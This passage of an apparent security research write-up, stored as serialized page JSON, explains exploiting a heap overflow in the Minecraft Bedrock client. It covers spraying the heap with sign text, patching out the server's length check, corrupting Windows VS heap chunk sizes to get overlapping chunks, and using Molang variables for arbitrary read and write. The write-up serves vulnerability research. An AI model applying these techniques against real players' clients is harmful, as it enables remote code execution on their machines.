world",{"type":24,"tag":301,"props":4637,"children":4638},{"style":359},[4639],{"type":30,"value":206},{"type":24,"tag":301,"props":4641,"children":4642},{"style":314},[4643],{"type":30,"value":4102},{"type":24,"tag":301,"props":4645,"children":4646},{"style":359},[4647],{"type":30,"value":362},{"type":24,"tag":301,"props":4649,"children":4650},{"style":329},[4651],{"type":30,"value":4111},{"type":24,"tag":301,"props":4653,"children":4654},{"style":359},[4655],{"type":30,"value":4656},"),\n",{"type":24,"tag":301,"props":4658,"children":4660},{"class":303,"line":4659},42,[4661],{"type":24,"tag":301,"props":4662,"children":4663},{"style":369},[4664],{"type":30,"value":4665}," sign_location\n",{"type":24,"tag":301,"props":4667,"children":4669},{"class":303,"line":4668},43,[4670],{"type":24,"tag":301,"props":4671,"children":4672},{"style":359},[4673],{"type":30,"value":4674}," );\n",{"type":24,"tag":301,"props":4676,"children":4678},{"class":303,"line":4677},44,[4679,4683,4687,4691],{"type":24,"tag":301,"props":4680,"children":4681},{"style":369},[4682],{"type":30,"value":4148},{"type":24,"tag":301,"props":4684,"children":4685},{"style":359},[4686],{"type":30,"value":206},{"type":24,"tag":301,"props":4688,"children":4689},{"style":314},[4690],{"type":30,"value":3744},{"type":24,"tag":301,"props":4692,"children":4693},{"style":359},[4694],{"type":30,"value":1707},{"type":24,"tag":301,"props":4696,"children":4698},{"class":303,"line":4697},45,[4699,4703,4707,4711,4715,4719],{"type":24,"tag":301,"props":4700,"children":4701},{"style":369},[4702],{"type":30,"value":4168},{"type":24,"tag":301,"props":4704,"children":4705},{"style":359},[4706],{"type":30,"value":206},{"type":24,"tag":301,"props":4708,"children":4709},{"style":314},[4710],{"type":30,"value":3766},{"type":24,"tag":301,"props":4712,"children":4713},{"style":359},[4714],{"type":30,"value":362},{"type":24,"tag":301,"props":4716,"children":4717},{"style":329},[4718],{"type":30,"value":3775},{"type":24,"tag":301,"props":4720,"children":4721},{"style":359},[4722],{"type":30,"value":791},{"type":24,"tag":301,"props":4724,"children":4726},{"class":303,"line":4725},46,[4727],{"type":24,"tag":301,"props":4728,"children":4729},{"style":359},[4730],{"type":30,"value":4674},{"type":24,"tag":301,"props":4732,"children":4734},{"class":303,"line":4733},47,[4735],{"type":24,"tag":301,"props":4736,"children":4737},{"emptyLinePlaceholder":16},[4738],{"type":30,"value":341},{"type":24,"tag":301,"props":4740,"children":4742},{"class":303,"line":4741},48,[4743,4747,4751],{"type":24,"tag":301,"props":4744,"children":4745},{"style":359},[4746],{"type":30,"value":4049},{"type":24,"tag":301,"props":4748,"children":4749},{"style":385},[4750],{"type":30,"value":4054},{"type":24,"tag":301,"props":4752,"children":4753},{"style":359},[4754],{"type":30,"value":4059},{"type":24,"tag":301,"props":4756,"children":4758},{"class":303,"line":4757},49,[4759],{"type":24,"tag":301,"props":4760,"children":4761},{"style":359},[4762],{"type":30,"value":3345},{"type":24,"tag":301,"props":4764,"children":4766},{"class":303,"line":4765},50,[4767],{"type":24,"tag":301,"props":4768,"children":4769},{"style":359},[4770],{"type":30,"value":501},{"type":24,"tag":301,"props":4772,"children":4774},{"class":303,"line":4773},51,[4775],{"type":24,"tag":301,"props":4776,"children":4777},{"style":359},[4778],{"type":30,"value":698},{"type":24,"tag":301,"props":4780,"children":4782},{"class":303,"line":4781},52,[4783],{"type":24,"tag":301,"props":4784,"children":4785},{"emptyLinePlaceholder":16},[4786],{"type":30,"value":341},{"type":24,"tag":301,"props":4788,"children":4790},{"class":303,"line":4789},53,[4791,4796,4800,4805,4809,4814,4818,4823,4828,4833,4837,4842],{"type":24,"tag":301,"props":4792,"children":4793},{"style":369},[4794],{"type":30,"value":4795},"world",{"type":24,"tag":301,"props":4797,"children":4798},{"style":359},[4799],{"type":30,"value":206},{"type":24,"tag":301,"props":4801,"children":4802},{"style":369},[4803],{"type":30,"value":4804},"afterEvents",{"type":24,"tag":301,"props":4806,"children":4807},{"style":359},[4808],{"type":30,"value":206},{"type":24,"tag":301,"props":4810,"children":4811},{"style":369},[4812],{"type":30,"value":4813},"playerSpawn",{"type":24,"tag":301,"props":4815,"children":4816},{"style":359},[4817],{"type":30,"value":206},{"type":24,"tag":301,"props":4819,"children":4820},{"style":314},[4821],{"type":30,"value":4822},"subscribe",{"type":24,"tag":301,"props":4824,"children":4825},{"style":359},[4826],{"type":30,"value":4827},"((",{"type":24,"tag":301,"props":4829,"children":4830},{"style":369},[4831],{"type":30,"value":4832},"arg",{"type":24,"tag":301,"props":4834,"children":4835},{"style":359},[4836],{"type":30,"value":911},{"type":24,"tag":301,"props":4838,"children":4839},{"style":348},[4840],{"type":30,"value":4841},"=>",{"type":24,"tag":301,"props":4843,"children":4844},{"style":359},[4845],{"type":30,"value":3035},{"type":24,"tag":301,"props":4847,"children":4849},{"class":303,"line":4848},54,[4850,4855],{"type":24,"tag":301,"props":4851,"children":4852},{"style":314},[4853],{"type":30,"value":4854}," create_wall",{"type":24,"tag":301,"props":4856,"children":4857},{"style":359},[4858],{"type":30,"value":4859},"();\n",{"type":24,"tag":301,"props":4861,"children":4863},{"class":303,"line":4862},55,[4864],{"type":24,"tag":301,"props":4865,"children":4866},{"style":359},[4867],{"type":30,"value":4868},"});\n",{"type":24,"tag":301,"props":4870,"children":4872},{"class":303,"line":4871},56,[4873],{"type":24,"tag":301,"props":4874,"children":4875},{"emptyLinePlaceholder":16},[4876],{"type":30,"value":341},{"type":24,"tag":301,"props":4878,"children":4880},{"class":303,"line":4879},57,[4881,4885,4889,4894,4898,4903,4907,4911,4915,4920,4924,4928,4932,4936],{"type":24,"tag":301,"props":4882,"children":4883},{"style":369},[4884],{"type":30,"value":4795},{"type":24,"tag":301,"props":4886,"children":4887},{"style":359},[4888],{"type":30,"value":206},{"type":24,"tag":301,"props":4890,"children":4891},{"style":369},[4892],{"type":30,"value":4893},"beforeEvents",{"type":24,"tag":301,"props":4895,"children":4896},{"style":359},[4897],{"type":30,"value":206},{"type":24,"tag":301,"props":4899,"children":4900},{"style":369},[4901],{"type":30,"value":4902},"playerLeave",{"type":24,"tag":301,"props":4904,"children":4905},{"style":359},[4906],{"type":30,"value":206},{"type":24,"tag":301,"props":4908,"children":4909},{"style":314},[4910],{"type":30,"value":4822},{"type":24,"tag":301,"props":4912,"children":4913},{"style":359},[4914],{"type":30,"value":362},{"type":24,"tag":301,"props":4916,"children":4917},{"style":348},[4918],{"type":30,"value":4919},"async",{"type":24,"tag":301,"props":4921,"children":4922},{"style":359},[4923],{"type":30,"value":873},{"type":24,"tag":301,"props":4925,"children":4926},{"style":369},[4927],{"type":30,"value":4832},{"type":24,"tag":301,"props":4929,"children":4930},{"style":359},[4931],{"type":30,"value":911},{"type":24,"tag":301,"props":4933,"children":4934},{"style":348},[4935],{"type":30,"value":4841},{"type":24,"tag":301,"props":4937,"children":4938},{"style":359},[4939],{"type":30,"value":3035},{"type":24,"tag":301,"props":4941,"children":4943},{"class":303,"line":4942},58,[4944,4949],{"type":24,"tag":301,"props":4945,"children":4946},{"style":314},[4947],{"type":30,"value":4948}," remove_wall",{"type":24,"tag":301,"props":4950,"children":4951},{"style":359},[4952],{"type":30,"value":4859},{"type":24,"tag":301,"props":4954,"children":4956},{"class":303,"line":4955},59,[4957],{"type":24,"tag":301,"props":4958,"children":4959},{"style":359},[4960],{"type":30,"value":4868},{"type":24,"tag":32,"props":4962,"children":4963},{},[4964],{"type":30,"value":4965},"This works well and produces a structure that the client ideally should not render - displaying and repeatedly updating this many signs during the spray would stall the client, which we want to avoid.",{"type":24,"tag":32,"props":4967,"children":4968},{},[4969],{"type":24,"tag":177,"props":4970,"children":4973},{"alt":4971,"src":4972},"image-min","/posts/minecraft-heap-overflow-to-rce/image3.png",[],{"type":24,"tag":32,"props":4975,"children":4976},{},[4977],{"type":30,"value":4978},"Preventing the client from rendering the sign wall is as simple as adjusting player’s view angle each tick, essentially forcing the client to look in the opposite direction of the sign wall.",{"type":24,"tag":270,"props":4980,"children":4982},{"id":4981},"a-small-roadblock",[4983],{"type":30,"value":4984},"A Small Roadblock",{"type":24,"tag":32,"props":4986,"children":4987},{},[4988],{"type":30,"value":4989},"While testing our heap spray method, we encountered the following error:",{"type":24,"tag":291,"props":4991,"children":4993},{"code":4992},"[Scripting] Error: Provided message is too long.\nMax length is 512 and the provided message has length of 1024.\n at alloc (index.js:169)\n",[4994],{"type":24,"tag":145,"props":4995,"children":4996},{"__ignoreMap":7},[4997],{"type":30,"value":4992},{"type":24,"tag":32,"props":4999,"children":5000},{},[5001,5003,5009],{"type":30,"value":5002},"An error is thrown by the server executable while trying to assign text longer than ",{"type":24,"tag":145,"props":5004,"children":5006},{"className":5005},[],[5007],{"type":30,"value":5008},"512",{"type":30,"value":5010}," bytes to a sign. This severely limits our approach, as it prevents us from spraying the VS heap with large chunks needed for the mentioned chunk-overlap technique.",{"type":24,"tag":32,"props":5012,"children":5013},{},[5014],{"type":30,"value":5015},"Before abandoning the idea entirely, we considered one possibility: perhaps this check only occurs server-side, and the client might not validate the length of the data it receives.",{"type":24,"tag":32,"props":5017,"children":5018},{},[5019],{"type":30,"value":5020},"We searched for the error message in the Bedrock server executable and located the length-validation logic:",{"type":24,"tag":32,"props":5022,"children":5023},{},[5024],{"type":24,"tag":177,"props":5025,"children":5027},{"alt":179,"src":5026},"/posts/minecraft-heap-overflow-to-rce/image4.png",[],{"type":24,"tag":32,"props":5029,"children":5030},{},[5031,5033,5039],{"type":30,"value":5032},"Although the involved functions are unnamed, it’s clear that we always want execution to take the ",{"type":24,"tag":145,"props":5034,"children":5036},{"className":5035},[],[5037],{"type":30,"value":5038},"string_length \u003C= 512",{"type":30,"value":5040}," branch, regardless of the actual length. Otherwise, the error is thrown and the client never allocates the desired chunk.",{"type":24,"tag":32,"props":5042,"children":5043},{},[5044],{"type":30,"value":5045},"The disassembly of the comparison looks like this:",{"type":24,"tag":32,"props":5047,"children":5048},{},[5049],{"type":24,"tag":177,"props":5050,"children":5052},{"alt":179,"src":5051},"/posts/minecraft-heap-overflow-to-rce/image5.png",[],{"type":24,"tag":32,"props":5054,"children":5055},{},[5056,5058,5064,5066,5072,5073,5078,5080,5086,5088,5094,5096,5101,5103,5108],{"type":30,"value":5057},"The code compares ",{"type":24,"tag":145,"props":5059,"children":5061},{"className":5060},[],[5062],{"type":30,"value":5063},"rax",{"type":30,"value":5065}," (the string length) to ",{"type":24,"tag":145,"props":5067,"children":5069},{"className":5068},[],[5070],{"type":30,"value":5071},"0x200",{"type":30,"value":873},{"type":24,"tag":145,"props":5074,"children":5076},{"className":5075},[],[5077],{"type":30,"value":5008},{"type":30,"value":5079}," decimal). It then performs a ",{"type":24,"tag":145,"props":5081,"children":5083},{"className":5082},[],[5084],{"type":30,"value":5085},"jbe",{"type":30,"value":5087},", jumping to address ",{"type":24,"tag":145,"props":5089,"children":5091},{"className":5090},[],[5092],{"type":30,"value":5093},"0x14275114c",{"type":30,"value":5095}," if ",{"type":24,"tag":145,"props":5097,"children":5099},{"className":5098},[],[5100],{"type":30,"value":5063},{"type":30,"value":5102}," is less than or equal to ",{"type":24,"tag":145,"props":5104,"children":5106},{"className":5105},[],[5107],{"type":30,"value":5008},{"type":30,"value":5109},". That target location contains the logic that instructs the client to update the sign text - the branch we want to reach every time.",{"type":24,"tag":32,"props":5111,"children":5112},{},[5113,5115,5120,5122,5128],{"type":30,"value":5114},"To force execution down this path, we patched the ",{"type":24,"tag":145,"props":5116,"children":5118},{"className":5117},[],[5119],{"type":30,"value":5085},{"type":30,"value":5121}," instruction to an unconditional ",{"type":24,"tag":145,"props":5123,"children":5125},{"className":5124},[],[5126],{"type":30,"value":5127},"jmp",{"type":30,"value":5129},", ensuring the correct branch is always taken, regardless of the comparison result.",{"type":24,"tag":32,"props":5131,"children":5132},{},[5133],{"type":24,"tag":177,"props":5134,"children":5136},{"alt":179,"src":5135},"/posts/minecraft-heap-overflow-to-rce/image6.png",[],{"type":24,"tag":32,"props":5138,"children":5139},{},[5140,5142,5147,5149,5155],{"type":30,"value":5141},"After patching the server and calling ",{"type":24,"tag":145,"props":5143,"children":5145},{"className":5144},[],[5146],{"type":30,"value":3171},{"type":30,"value":5148}," with a size of ",{"type":24,"tag":145,"props":5150,"children":5152},{"className":5151},[],[5153],{"type":30,"value":5154},"1024",{"type":30,"value":5156},", the operation now executes successfully, and the client happily allocates a chunk of that size:",{"type":24,"tag":32,"props":5158,"children":5159},{},[5160],{"type":24,"tag":177,"props":5161,"children":5163},{"alt":179,"src":5162},"/posts/minecraft-heap-overflow-to-rce/image7.png",[],{"type":24,"tag":2719,"props":5165,"children":5166},{},[],{"type":24,"tag":32,"props":5168,"children":5169},{},[5170],{"type":30,"value":5171},"Having a way to spray the heap is great - we can now use the previously mentioned technique to create overlapping chunks in the VS heap, or use it to shape the LFH so that the 4-byte overflow can overwrite an internal Minecraft structure.",{"type":24,"tag":32,"props":5173,"children":5174},{},[5175],{"type":30,"value":5176},"At the time, we couldn't find any useful Minecraft structures to abuse with just a 4-byte OOB write, so we worked on getting overlapping chunks instead.",{"type":24,"tag":80,"props":5178,"children":5180},{"id":5179},"overlapping-heap-chunks",[5181],{"type":30,"value":5182},"Overlapping Heap Chunks",{"type":24,"tag":32,"props":5184,"children":5185},{},[5186,5188,5194],{"type":30,"value":5187},"The attack is described in detail in the referenced blog post (",{"type":24,"tag":188,"props":5189,"children":5191},{"href":2905,"rel":5190},[192],[5192],{"type":30,"value":5193},"here",{"type":30,"value":5195},"), so we will present a high-level overview.",{"type":24,"tag":32,"props":5197,"children":5198},{},[5199,5201,5207],{"type":30,"value":5200},"The core idea is to insert a large chunk that overlaps other chunks above it into the free list. To understand this, some basic knowledge of ",{"type":24,"tag":145,"props":5202,"children":5204},{"className":5203},[],[5205],{"type":30,"value":5206},"_HEAP_VS_CHUNK_HEADER",{"type":30,"value":5208}," structure layout is required:",{"type":24,"tag":291,"props":5210,"children":5212},{"code":5211}," +---------------------------+ +---------------+\n+0x0 |_HEAP_VS_CHUNK_HEADER_SIZE +----> +0x0 |MemoryCost |\n +---------------------------+ +---------------+\n+0x8 |EncodedSegmentPageOffset | +0x2 |UnsafeSize |\n +---------------------------+ +---------------+\n+0x8 |UnusedBytes | +0x4 |UnsafePrevSize |\n +---------------------------+ +---------------+\n | . . . | +0x6 |Allocated |\n +---------------+\n | . . . |\n",[5213],{"type":24,"tag":145,"props":5214,"children":5215},{"__ignoreMap":7},[5216],{"type":30,"value":5211},{"type":24,"tag":32,"props":5218,"children":5219},{},[5220,5222,5228,5230,5236,5237,5243,5244,5250,5252,5257,5259,5265,5267,5273,5275,5280,5282,5288],{"type":30,"value":5221},"At offset 0 there is a header ",{"type":24,"tag":145,"props":5223,"children":5225},{"className":5224},[],[5226],{"type":30,"value":5227},"_HEAP_VS_CHUNK_HEADER_SIZE",{"type":30,"value":5229}," containing fields such as ",{"type":24,"tag":145,"props":5231,"children":5233},{"className":5232},[],[5234],{"type":30,"value":5235},"MemoryCost",{"type":30,"value":377},{"type":24,"tag":145,"props":5238,"children":5240},{"className":5239},[],[5241],{"type":30,"value":5242},"UnsafeSize",{"type":30,"value":377},{"type":24,"tag":145,"props":5245,"children":5247},{"className":5246},[],[5248],{"type":30,"value":5249},"UnsafePrevSize",{"type":30,"value":5251},", etc. For the attack we only care about the ",{"type":24,"tag":145,"props":5253,"children":5255},{"className":5254},[],[5256],{"type":30,"value":5242},{"type":30,"value":5258}," field: it holds the size of the chunk as its value. Specifically the value is size divided by ",{"type":24,"tag":145,"props":5260,"children":5262},{"className":5261},[],[5263],{"type":30,"value":5264},"0x10",{"type":30,"value":5266},", so for a chunk of size ",{"type":24,"tag":145,"props":5268,"children":5270},{"className":5269},[],[5271],{"type":30,"value":5272},"0x4010",{"type":30,"value":5274}," the value of ",{"type":24,"tag":145,"props":5276,"children":5278},{"className":5277},[],[5279],{"type":30,"value":5242},{"type":30,"value":5281}," would be ",{"type":24,"tag":145,"props":5283,"children":5285},{"className":5284},[],[5286],{"type":30,"value":5287},"0x401",{"type":30,"value":206},{"type":24,"tag":32,"props":5290,"children":5291},{},[5292,5294,5299],{"type":30,"value":5293},"This ",{"type":24,"tag":145,"props":5295,"children":5297},{"className":5296},[],[5298],{"type":30,"value":5242},{"type":30,"value":5300}," field is a 2-byte field located at offset 0x2 relative to the header. Because of that, it can be fully overwritten by the final two bytes of the 4-byte OOB write.",{"type":24,"tag":32,"props":5302,"children":5303},{},[5304,5306,5311,5313,5318,5320,5326,5328,5333],{"type":30,"value":5305},"The field is encoded with a random key that we do not know, so the exact bytes which we overwrite it with don't matter and the size after will be random. That said, by overwriting ",{"type":24,"tag":145,"props":5307,"children":5309},{"className":5308},[],[5310],{"type":30,"value":5242},{"type":30,"value":5312}," in the smallest possible VS chunk (",{"type":24,"tag":145,"props":5314,"children":5316},{"className":5315},[],[5317],{"type":30,"value":5272},{"type":30,"value":5319},"), we maximize the probability that the decoded size becomes larger than the original. Since the decoded size will be anywhere in ",{"type":24,"tag":145,"props":5321,"children":5323},{"className":5322},[],[5324],{"type":30,"value":5325},"[0x10, 0xffff0]",{"type":30,"value":5327}," range, the probability that it exceeds ",{"type":24,"tag":145,"props":5329,"children":5331},{"className":5330},[],[5332],{"type":30,"value":5272},{"type":30,"value":5334}," is:",{"type":24,"tag":291,"props":5336,"children":5338},{"code":5337},"1 - ((0x4010 - 0x10) / (0xffff0 - 0x10)) ~= 98.4%\n",[5339],{"type":24,"tag":145,"props":5340,"children":5341},{"__ignoreMap":7},[5342],{"type":30,"value":5337},{"type":24,"tag":32,"props":5344,"children":5345},{},[5346],{"type":30,"value":5347},"Thus, there is roughly a 98% chance that the resulting decoded size will be larger than the original chunk size.",{"type":24,"tag":32,"props":5349,"children":5350},{},[5351],{"type":30,"value":5352},"Considering there are slight differences between the kernel and userland heap, and that maximizing the success rate of the attack doesn't matter as much for purposes of this writeup, we will do a simplified attack to the one in the referenced blogpost.",{"type":24,"tag":270,"props":5354,"children":5356},{"id":5355},"overlap-attack-overview",[5357],{"type":30,"value":5358},"Overlap Attack Overview",{"type":24,"tag":32,"props":5360,"children":5361},{},[5362,5364,5370],{"type":30,"value":5363},"The goal of the attack is to overwrite the first four bytes of the VS chunk header that we control - in this case the allocation that holds sign text. We then call ",{"type":24,"tag":145,"props":5365,"children":5367},{"className":5366},[],[5368],{"type":30,"value":5369},"free()",{"type":30,"value":5371}," on the overwritten chunk so it is inserted into the free list as an overly large chunk, which we can use to create overlaps.",{"type":24,"tag":32,"props":5373,"children":5374},{},[5375,5377,5382,5384,5389],{"type":30,"value":5376},"We don't know the remote client's exact heap layout, but it likely contains ",{"type":24,"tag":145,"props":5378,"children":5380},{"className":5379},[],[5381],{"type":30,"value":1127},{"type":30,"value":5383},"-sized chunks in the free list that we want to avoid. If a ",{"type":24,"tag":145,"props":5385,"children":5387},{"className":5386},[],[5388],{"type":30,"value":1127},{"type":30,"value":5390},"-sized free chunk is used, the 4-byte OOB write could clobber some unknown chunk above it that we don’t control.",{"type":24,"tag":32,"props":5392,"children":5393},{},[5394,5396,5401],{"type":30,"value":5395},"To remove those ",{"type":24,"tag":145,"props":5397,"children":5399},{"className":5398},[],[5400],{"type":30,"value":1127},{"type":30,"value":5402},"-sized chunks from the free list we allocate many signs of that size. The allocator will first reuse free-list entries and then create new regions when the free list is exhausted.",{"type":24,"tag":32,"props":5404,"children":5405},{},[5406],{"type":30,"value":5407},"After draining the free list, we spray the VS heap with many more chunks of the same size. If the free list has been emptied, most of these allocations will be contiguous, producing many adjacent sign allocations like:",{"type":24,"tag":291,"props":5409,"children":5411},{"code":5410},"+--------+--------+--------+--------+--------+\n| | | | | |\n| Sign A | Sign B | Sign C | Sign D | Sign F |\n| | | | | |\n+--------+--------+--------+--------+--------+\n",[5412],{"type":24,"tag":145,"props":5413,"children":5414},{"__ignoreMap":7},[5415],{"type":30,"value":5410},{"type":24,"tag":32,"props":5417,"children":5418},{},[5419,5421,5427,5429,5434],{"type":30,"value":5420},"Next we create ",{"type":24,"tag":5422,"props":5423,"children":5424},"em",{},[5425],{"type":30,"value":5426},"holes",{"type":30,"value":5428}," in the contiguous spray by freeing every other sign allocation. That inserts ",{"type":24,"tag":145,"props":5430,"children":5432},{"className":5431},[],[5433],{"type":30,"value":1127},{"type":30,"value":5435},"-sized free chunks where we want them - directly below allocated sign chunks:",{"type":24,"tag":291,"props":5437,"children":5439},{"code":5438}," Free Free \n+--------+--------+--------+--------+--------+\n| |........| |........| |\n| Sign A |........| Sign C |........| Sign F |\n| |........| |........| |\n+--------+--------+--------+--------+--------+\n",[5440],{"type":24,"tag":145,"props":5441,"children":5442},{"__ignoreMap":7},[5443],{"type":30,"value":5438},{"type":24,"tag":32,"props":5445,"children":5446},{},[5447,5449,5454,5456,5461],{"type":30,"value":5448},"When a ",{"type":24,"tag":145,"props":5450,"children":5452},{"className":5451},[],[5453],{"type":30,"value":1127},{"type":30,"value":5455}," allocation is later requested, the allocator will likely satisfy it from one of our inserted holes. As a result, the next adjacent allocated chunk’s ",{"type":24,"tag":145,"props":5457,"children":5459},{"className":5458},[],[5460],{"type":30,"value":5242},{"type":30,"value":5462}," field will be overwritten:",{"type":24,"tag":291,"props":5464,"children":5466},{"code":5465}," +--------+ \n Free | | \n+--------+--------+--------+ g->out +--------+\n| |........| | | |\n| Sign A |........| Sign C +--------+ Sign F |\n| |........| | | |\n+--------+--------+--------+ +--------+\n",[5467],{"type":24,"tag":145,"props":5468,"children":5469},{"__ignoreMap":7},[5470],{"type":30,"value":5465},{"type":24,"tag":32,"props":5472,"children":5473},{},[5474,5476,5481,5483,5488,5490,5495],{"type":30,"value":5475},"Once ",{"type":24,"tag":145,"props":5477,"children":5479},{"className":5478},[],[5480],{"type":30,"value":5242},{"type":30,"value":5482}," has been overwritten, ",{"type":24,"tag":145,"props":5484,"children":5486},{"className":5485},[],[5487],{"type":30,"value":1127},{"type":30,"value":5489}," allocation is freed immediately after, restoring the previous layout but with ",{"type":24,"tag":145,"props":5491,"children":5493},{"className":5492},[],[5494],{"type":30,"value":5242},{"type":30,"value":5496}," field corrupted:",{"type":24,"tag":291,"props":5498,"children":5500},{"code":5499}," UnsafeSize Overwritten\n ^ \n | \n Free Free | \n+--------+--------+--------+--------+---+----+ \n| |........| |........| | \n| Sign A |........| Sign C |........| Sign F | \n| |........| |........| | \n+--------+--------+--------+--------+--------+ \n",[5501],{"type":24,"tag":145,"props":5502,"children":5503},{"__ignoreMap":7},[5504],{"type":30,"value":5499},{"type":24,"tag":32,"props":5506,"children":5507},{},[5508],{"type":30,"value":5509},"To avoid adjacent-chunk consolidation in the next phase, we spray additional signs to fill the holes inside our contiguous region:",{"type":24,"tag":291,"props":5511,"children":5513},{"code":5512}," UnsafeSize Overwritten\n ^ \n | \n | \n+--------+--------+--------+--------+---+----+ \n| | | | | | \n| Sign A | Sign B | Sign C | Sign D | Sign F | \n| | | | | | \n+--------+--------+--------+--------+--------+ \n",[5514],{"type":24,"tag":145,"props":5515,"children":5516},{"__ignoreMap":7},[5517],{"type":30,"value":5512},{"type":24,"tag":32,"props":5519,"children":5520},{},[5521],{"type":30,"value":5522},"Finally, we free the rest of the contiguous spray. One of the freed allocations will have a corrupted (and likely overly large) size, giving us a much larger overflow:",{"type":24,"tag":291,"props":5524,"children":5526},{"code":5525}," Freed Overwritten \n | \n +----------+----------+\n | |\n Free Free v v\n+--------+--------+--------+--------+--------+- - - - - - -\n|........| |........| |........| \n|........| Sign B |........| Sign D |........| Other chunks\n|........| |........| |........| \n+--------+--------+--------+--------+--------+- - - - - - -\n",[5527],{"type":24,"tag":145,"props":5528,"children":5529},{"__ignoreMap":7},[5530],{"type":30,"value":5525},{"type":24,"tag":2719,"props":5532,"children":5533},{},[],{"type":24,"tag":32,"props":5535,"children":5536},{},[5537],{"type":30,"value":5538},"This yields a substantially larger overflow primitive than the original 4-byte OOB. However, without an information leak, ASLR is still a big issue and finding a single ideal structure was difficult.",{"type":24,"tag":32,"props":5540,"children":5541},{},[5542],{"type":30,"value":5543},"Instead of looking for simple structures, we shifted focus to more complex server-controlled scripting systems executed by the client - eventually finding Molang.",{"type":24,"tag":80,"props":5545,"children":5547},{"id":5546},"molang",[5548],{"type":30,"value":5549},"Molang",{"type":24,"tag":32,"props":5551,"children":5552},{},[5553,5555,5562],{"type":30,"value":5554},"Molang is a Minecraft-specific scripting language designed for simple math operations and a lightweight state model. It typically controls client-side entity animations and can be included in resource packs delivered by the server. A high-level overview is available in the official ",{"type":24,"tag":188,"props":5556,"children":5559},{"href":5557,"rel":5558},"https://learn.microsoft.com/en-us/minecraft/creator/documents/molang/syntax-guide?view=minecraft-bedrock-stable",[192],[5560],{"type":30,"value":5561},"syntax guide",{"type":30,"value":206},{"type":24,"tag":32,"props":5564,"children":5565},{},[5566,5568,5573,5574,5579],{"type":30,"value":5567},"The available base types are simple: numbers are 32-bit floats, and there is a string type for which only the ",{"type":24,"tag":145,"props":5569,"children":5571},{"className":5570},[],[5572],{"type":30,"value":607},{"type":30,"value":2378},{"type":24,"tag":145,"props":5575,"children":5577},{"className":5576},[],[5578],{"type":30,"value":463},{"type":30,"value":5580}," operators are supported.",{"type":24,"tag":32,"props":5582,"children":5583},{},[5584,5586,5592,5594,5600,5602,5607,5608,5614,5616],{"type":30,"value":5585},"Variables are defined by prepending ",{"type":24,"tag":145,"props":5587,"children":5589},{"className":5588},[],[5590],{"type":30,"value":5591},"variable.",{"type":30,"value":5593}," to the name and assigning a value. For example, to define ",{"type":24,"tag":145,"props":5595,"children":5597},{"className":5596},[],[5598],{"type":30,"value":5599},"result",{"type":30,"value":5601}," as the sum of ",{"type":24,"tag":145,"props":5603,"children":5605},{"className":5604},[],[5606],{"type":30,"value":188},{"type":30,"value":2378},{"type":24,"tag":145,"props":5609,"children":5611},{"className":5610},[],[5612],{"type":30,"value":5613},"b",{"type":30,"value":5615},": ",{"type":24,"tag":145,"props":5617,"children":5619},{"className":5618},[],[5620],{"type":30,"value":5621},"variable.result = variable.a + variable.b;",{"type":24,"tag":32,"props":5623,"children":5624},{},[5625,5627,5633,5634,5640,5641,5646,5647,5652],{"type":30,"value":5626},"Logical operators such as ",{"type":24,"tag":145,"props":5628,"children":5630},{"className":5629},[],[5631],{"type":30,"value":5632},"||",{"type":30,"value":377},{"type":24,"tag":145,"props":5635,"children":5637},{"className":5636},[],[5638],{"type":30,"value":5639},"&&",{"type":30,"value":377},{"type":24,"tag":145,"props":5642,"children":5644},{"className":5643},[],[5645],{"type":30,"value":1849},{"type":30,"value":377},{"type":24,"tag":145,"props":5648,"children":5650},{"className":5649},[],[5651],{"type":30,"value":1456},{"type":30,"value":5653},", etc., are supported, and conditional branching is implemented using ternary-style blocks:",{"type":24,"tag":291,"props":5655,"children":5657},{"code":5656},"(variable.result == 3) ? {\n return 1;\n} : {\n return 0;\n}\n",[5658],{"type":24,"tag":145,"props":5659,"children":5660},{"__ignoreMap":7},[5661],{"type":30,"value":5656},{"type":24,"tag":32,"props":5663,"children":5664},{},[5665],{"type":30,"value":5666},"As shown, Molang is very simple, but we hoped it would be sufficient as a second-stage payload to achieve client-side arbitrary read and write.",{"type":24,"tag":270,"props":5668,"children":5670},{"id":5669},"molang-internals",[5671],{"type":30,"value":5672},"Molang Internals",{"type":24,"tag":32,"props":5674,"children":5675},{},[5676],{"type":30,"value":5677},"What interested us most was how variables are handled. Specifically, we wondered whether we could use the overflow to corrupt a variable and then leverage that corrupted variable to perform arbitrary reads - leaking the information needed to bypass ASLR inside the Molang script, and subsequently use those leaks to carry out arbitrary writes.",{"type":24,"tag":32,"props":5679,"children":5680},{},[5681],{"type":30,"value":5682},"Below we describe the structures involved and their memory layout.",{"type":24,"tag":270,"props":5684,"children":5686},{"id":5685},"molangvariable-and-molangscriptarg",[5687],{"type":30,"value":5688},"MolangVariable and MolangScriptArg",{"type":24,"tag":32,"props":5690,"children":5691},{},[5692,5694,5700],{"type":30,"value":5693},"A ",{"type":24,"tag":145,"props":5695,"children":5697},{"className":5696},[],[5698],{"type":30,"value":5699},"MolangVariable",{"type":30,"value":5701}," structure is created for every declared variable. Simplified, it looks something like this:",{"type":24,"tag":291,"props":5703,"children":5705},{"code":5704,"language":294,"meta":7,"className":295,"style":7},"struct MolangVariable {\n \n struct HashedString {\n uint64_t variable_name_hash;\n std::string variable_name;\n };\n \n struct MolangScriptArg {\n uint32_t value_type;\n uint64_t value;\n std::vector\u003Cstruct MolangScriptArg> struct_fields;\n \n [...]\n };\n};\n",[5706],{"type":24,"tag":145,"props":5707,"children":5708},{"__ignoreMap":7},[5709,5721,5728,5741,5754,5762,5769,5776,5788,5801,5813,5843,5851,5859,5866],{"type":24,"tag":301,"props":5710,"children":5711},{"class":303,"line":304},[5712,5716],{"type":24,"tag":301,"props":5713,"children":5714},{"style":348},[5715],{"type":30,"value":3010},{"type":24,"tag":301,"props":5717,"children":5718},{"style":359},[5719],{"type":30,"value":5720}," MolangVariable {\n",{"type":24,"tag":301,"props":5722,"children":5723},{"class":303,"line":320},[5724],{"type":24,"tag":301,"props":5725,"children":5726},{"style":359},[5727],{"type":30,"value":649},{"type":24,"tag":301,"props":5729,"children":5730},{"class":303,"line":335},[5731,5736],{"type":24,"tag":301,"props":5732,"children":5733},{"style":348},[5734],{"type":30,"value":5735}," struct",{"type":24,"tag":301,"props":5737,"children":5738},{"style":359},[5739],{"type":30,"value":5740}," HashedString {\n",{"type":24,"tag":301,"props":5742,"children":5743},{"class":303,"line":344},[5744,5749],{"type":24,"tag":301,"props":5745,"children":5746},{"style":348},[5747],{"type":30,"value":5748}," uint64_t",{"type":24,"tag":301,"props":5750,"children":5751},{"style":359},[5752],{"type":30,"value":5753}," 